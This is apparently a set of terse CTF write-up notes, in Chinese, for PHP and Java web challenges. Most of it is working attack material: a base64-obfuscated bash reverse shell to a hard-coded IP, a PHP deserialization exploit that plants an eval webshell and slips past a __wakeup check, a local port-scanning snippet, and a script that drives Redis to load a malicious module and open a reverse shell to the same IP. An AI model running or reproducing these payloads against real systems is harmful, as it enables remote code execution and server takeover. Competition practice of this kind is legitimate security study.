jackjson

有个shiro

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}

esay_eval

exp

<?php
class A{
    public $code = "eval(\$_POST['cmd']]);";
    function __call($method,$args){
        eval($this->code);

    }
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    function __destruct(){
        echo $this->a->a();
    }
}

$b = new B();
$b->a=new A();
echo serialize($b);
//if(isset($_REQUEST['poc'])){
//    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
//    if (isset($ret[1])) {
//        foreach ($ret[1] as $i) {
//            if(intval($i)!==1){
//                exit("you want to bypass wakeup ? no !");
//            }
//        }
//        unserialize($_REQUEST['poc']);
//    }
//
//
//}else{
//    highlight_file(__FILE__);
//}

大小写绕正则

O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:21:"@eval($_POST["cmd"]);";}}

需要绕disable_function

.config.php.swp

可以发现有个redis服务,扫端口

?><?php
for($i=0;$i<65535;$i++) {
 $t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
  if($ee2 === "Address already in use") {
    var_dump($i);
  }
}

6379

/tmp目录可以上传

<?php
function Getfile($host, $port, $link){
    $fp = fsockopen($host, intval($port), $errno, $errstr, 30);
    if(!$fp){
        echo "$errstr (error number $errno) \n";
    }else{
        $out  = "$link";
        //$out = "GET $link HTTP/1.1\r\n";
        //$out .= "HOST $host \r\n";
        //$out .= "Connection: Close\r\n\r\n";
        //$out .= "\r\n";
        fwrite($fp, $out);
        $content = '';
        while(!feof($fp)){
            $contents .= fgets($fp, 1024);
        }
        fclose($fp);
        return $contents;
    }
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 47.96.31.86 2333\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);

var_dump(Getfile("127.0.0.1","6379",$poc));

penson

https://www.penson.top